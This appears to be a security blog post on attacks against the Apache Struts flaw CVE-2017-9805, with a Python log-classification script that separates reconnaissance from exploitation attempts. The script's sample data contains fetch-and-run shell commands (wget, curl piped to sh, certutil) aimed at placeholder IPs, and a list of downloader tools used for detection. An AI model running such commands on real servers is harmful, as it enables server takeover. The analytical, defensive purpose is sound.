To date, our systems have successfully blocked thousands of attacks from all over the world, with China, as usual for Apache Struts vulnerabilities, identified as the most prominent source of attacks (see Figure 1).

Figure 1: Geo-distribution of CVE-2017-9805 attacks

It is interesting to note that a single Chinese IP is responsible for more than 40% of the attack attempts we registered. According to Shodan, this IP is registered to a large Chinese e-commerce company and runs an open SSH server, which may indicate that it is a compromised machine. This machine tried to attack dozens of sites with different automated tools that identified themselves either as legitimate browsers or as cURL, wget and Python-requests, which indicates the persistence of the attacker(s).

Unlike past vulnerabilities, most of the attempted attacks (80%) were exploitation attempts and only 20% were reconnaissance attempts to identify vulnerable servers (see Figure 2). Exploitation attempts involved running operating system commands such as a shell, wget or cURL in order to download a malicious payload and take over the server to mount further attacks, usually DDoS, as part of a larger botnet.

Figure 2: Percentage of payload types of CVE-2017-9805 attack attempts
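The split between reconnaissance and exploitation, and the share of a single source IP, are the kind of numbers a WAF or log pipeline derives by classifying the command each blocked request tried to run. The script below is an added example, not code from the original post or from the vendor's systems: it parses a simplified stand-in for the Struts REST XStream payload shape (only the java.lang.ProcessBuilder command array, with no gadget chain, so it is not a working exploit), labels each attempt as reconnaissance (a command that merely proves execution, such as id or nslookup) or exploitation (a command that fetches and runs a remote payload with wget, curl, certutil and the like), and tallies source IPs and User-Agent families. All IPs, hosts, User-Agent strings and commands in SAMPLE_EVENTS are constructed.

```python
"""Classify CVE-2017-9805 attempt logs as reconnaissance vs exploitation
and summarise sources, the way the statistics in the post are built.
Added example with constructed data; not the post's own tooling."""
import re
import xml.etree.ElementTree as ET
from collections import Counter

# Tools whose presence in the command means "download and run a payload".
DOWNLOADERS = ("wget", "curl", "fetch", "tftp", "ftp", "certutil", "powershell")


def payload(*argv):
    """Constructed, simplified stand-in for the XStream payload shape that
    CVE-2017-9805 abused: the Struts REST plugin deserialised request XML
    with XStream and no type restrictions, so a body describing a
    java.lang.ProcessBuilder ended with its <command> array being executed.
    Only that fragment is modelled here; it is not a working exploit."""
    return ("<map><entry><java.lang.ProcessBuilder><command>"
            + "".join(f"<string>{a}</string>" for a in argv)
            + "</command></java.lang.ProcessBuilder></entry></map>")


def extract_command(body):
    """Return the argv list from the <command> array, or None when the body
    is not XML or carries no ProcessBuilder command.
    (For untrusted XML in production use defusedxml; ElementTree is fine
    here because the samples are constructed.)"""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    node = root.find(".//command")
    if node is None:
        return None
    return [s.text or "" for s in node.findall("string")]


def classify(argv):
    """'exploit' if the command fetches or runs a remote payload, 'recon' if
    it only proves code execution, 'none' for bodies without a command."""
    if not argv:
        return "none"
    joined = " ".join(argv)
    if "/dev/tcp" in joined or any(re.search(rf"\b{tool}\b", joined)
                                   for tool in DOWNLOADERS):
        return "exploit"
    return "recon"


def summarise(events):
    """events: iterable of (src_ip, user_agent, request_body).
    Returns category percentages, the busiest source IP and its share, and
    counts per User-Agent family (the product name before the '/')."""
    by_type, by_ip, by_ua = Counter(), Counter(), Counter()
    for ip, ua, body in events:
        kind = classify(extract_command(body))
        if kind == "none":
            continue
        by_type[kind] += 1
        by_ip[ip] += 1
        by_ua[ua.split("/")[0]] += 1
    total = sum(by_type.values())
    top_ip, top_n = by_ip.most_common(1)[0]
    return {
        "total": total,
        "exploit_pct": round(100 * by_type["exploit"] / total),
        "recon_pct": round(100 * by_type["recon"] / total),
        "top_ip": top_ip,
        "top_ip_pct": round(100 * top_n / total),
        "user_agents": dict(by_ua),
    }


# Constructed sample: one persistent source (203.0.113.7) rotating tools,
# two other sources, and one non-RCE body that must not be counted.
SAMPLE_EVENTS = [
    ("203.0.113.7", "curl/7.54.0", payload("/bin/sh", "-c", "wget http://198.51.100.9/x.sh -O /tmp/x.sh")),
    ("203.0.113.7", "Wget/1.19", payload("/bin/sh", "-c", "curl http://198.51.100.9/x.sh | sh")),
    ("203.0.113.7", "python-requests/2.18.4", payload("/bin/bash", "-c", "wget http://198.51.100.9/b; chmod +x b; ./b")),
    ("203.0.113.7", "Mozilla/5.0 (Windows NT 10.0)", payload("/bin/sh", "-c", "curl -s http://198.51.100.9/c | sh")),
    ("203.0.113.7", "curl/7.54.0", payload("/bin/sh", "-c", "id")),
    ("198.51.100.23", "python-requests/2.18.4", payload("/bin/sh", "-c", "nslookup probe.example")),
    ("192.0.2.44", "Mozilla/5.0 (X11; Linux x86_64)", payload("/bin/sh", "-c", "wget http://203.0.113.200/m -O /tmp/m")),
    ("192.0.2.44", "Wget/1.19", payload("cmd.exe", "/c", "certutil -urlcache -split -f http://203.0.113.200/m.exe")),
    ("198.51.100.23", "curl/7.54.0", payload("/bin/sh", "-c", "curl http://203.0.113.200/r | sh")),
    ("198.51.100.23", "Wget/1.19", payload("/bin/sh", "-c", "wget -q http://203.0.113.200/s -O- | sh")),
    ("192.0.2.44", "python-requests/2.18.4", "<map><entry><string>ping</string><string>1</string></entry></map>"),
]

if __name__ == "__main__":
    for key, value in summarise(SAMPLE_EVENTS).items():
        print(f"{key}: {value}")
```

The recon/exploit boundary is a judgement call: a command that only runs id or a DNS lookup still proves remote code execution, so a real pipeline would alert on both, but separating the two is what lets the post's 80/20 figure say something about attacker intent rather than just volume.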